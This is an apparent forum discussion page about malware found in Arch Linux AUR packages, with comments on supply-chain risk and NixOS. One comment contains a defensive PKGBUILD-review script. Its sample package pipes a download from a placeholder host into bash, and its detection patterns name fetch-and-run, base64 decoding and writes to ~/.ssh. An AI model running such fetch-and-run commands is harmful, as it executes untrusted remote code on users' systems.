Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack
ImJamal
54 points
17 comments
June 14, 2026
Related Discussions
Found 5 related stories in 109.8ms across 10,500 title embeddings via pgvector HNSW
- Arch Linux's AUR Sees More Than 400 Packages Compromised with Malware spiros · 32 pts · June 12, 2026 · 82% similar
- Arch Linux Now Believes Malware Incident Under Control: More Than 1,500 Packages qwertox · 288 pts · June 13, 2026 · 81% similar
- There is a bunch of malware being spotted in the AUR Velocifyer · 13 pts · June 11, 2026 · 77% similar
- Over 400 Malicious packages found in Arch AUR Hydrocarb0n · 11 pts · June 12, 2026 · 73% similar
- Over 900 Arch Linux Packages Infected with infostealers and rootkits fortran77 · 20 pts · June 12, 2026 · 70% similar
Discussion Highlights (6 comments)
7e
Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.
Shank
Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?
helterskelter
This is why I avoid AUR, it's too easy to become complacent. If I really want something from AUR I literally just look at the PKGBUILD for compilation instructions and do it manually by myself, but if it's got so many patches or dependencies that I can't go through them all by hand I just find another solution or do without. This is also why I really dislike a lot of modern languages with automated fetching of dependencies. It really fosters a sloppy attitude toward your supply chain because it's just too damned convenient. With a reasonably sized Go project for instance, you may be pulling in code from dozens of different git repos. It only takes one compromised repo or malicious package to sink the ship.
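The manual PKGBUILD review this comment describes can be partly mechanised before the human read-through. The script below is an added example, not code from the thread or from Arch's tooling; it parses a constructed sample PKGBUILD (not a real AUR package) and lists the things a reviewer would want to look at first: checksums set to `SKIP`, a source count that does not match the checksum count, sources hosted somewhere other than the declared upstream `url` (a heuristic only; many legitimate packages fetch from a forge that differs from the project site), and build or package steps that pipe downloads into a shell, decode base64, or touch the user's home directory. The findings are prompts for inspection, not a verdict.

```python
import re
from urllib.parse import urlsplit

# Constructed sample PKGBUILD for illustration; not a real AUR package.
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
url="https://example.com/example-tool"
source=("https://example.com/releases/example-tool-1.2.3.tar.gz"
        "helper.sh::https://cdn.invalid/helper.sh")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://cdn.invalid/post.sh | bash
}
"""

# Shell idioms in build()/package() that deserve a human look before makepkg runs.
RISKY_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b", "download piped straight into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\beval\b", "eval of dynamically built text"),
    (r"(\$HOME|~)/\.(bashrc|profile|ssh|config)\b", "writes into the user's home directory"),
    (r"\b(systemctl|crontab)\b", "service or cron manipulation from a build script"),
]

def parse_array(text, name):
    """Return the items of a bash array like source=(...) or a scalar like url="..."."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    if m:
        items = re.findall(r"\"([^\"]*)\"|'([^']*)'|(\S+)", m.group(1))
        return [a or b or c for a, b, c in items]
    m = re.search(rf"^{name}=(['\"]?)(.*?)\1\s*$", text, re.M)
    return [m.group(2)] if m else []

def source_host(entry):
    """Strip makepkg's 'localname::url' prefix and return the URL host (None for local files)."""
    url = entry.split("::", 1)[-1]
    if "://" not in url:
        return None
    return urlsplit(url).hostname

def review_pkgbuild(text):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    sources = parse_array(text, "source")
    sums = []
    for algo in ("sha256sums", "sha512sums", "b2sums", "md5sums"):
        sums = parse_array(text, algo)
        if sums:
            break
    if sources and len(sums) != len(sources):
        findings.append(f"{len(sources)} sources but {len(sums)} checksums")
    for i, s in enumerate(sums):
        if s.upper() == "SKIP":
            which = sources[i] if i < len(sources) else "?"
            findings.append(f"source[{i}] has checksum SKIP: {which}")
    upstream = parse_array(text, "url")
    upstream_host = urlsplit(upstream[0]).hostname if upstream else None
    for i, entry in enumerate(sources):
        host = source_host(entry)
        if host and upstream_host and host != upstream_host:
            findings.append(f"source[{i}] host {host} differs from upstream url host {upstream_host}")
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, why in RISKY_PATTERNS:
            if re.search(pattern, line):
                findings.append(f"line {lineno}: {why}: {line.strip()}")
    return findings

if __name__ == "__main__":
    for finding in review_pkgbuild(SAMPLE_PKGBUILD):
        print("-", finding)
```

Run it against a PKGBUILD fetched with `git clone` from the AUR before invoking `makepkg`; anything it flags is where the manual reading should start, and a `SKIP` checksum on a remote source is worth treating as a blocker rather than a warning.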
hollow-moe
Is the nixpkgs repo more "resilient" to these kinds of attacks since an attacker would need the approval of a member with merge permission?
bfrog
I’m moving all my machines to NixOS. I’d done this before but ran into time constraints creating ports for convoluted binary software. With LLMs now as good as they are it’s quite possible this isn’t a problem anymore. I’ll be finding out.
skeledrew
I wouldn't be surprised if this is some kind of implicit "use AI or else" statement. I've been anticipating some kind of hit on Gentoo given their outspoken no-AI stance. Unsure of Arch's.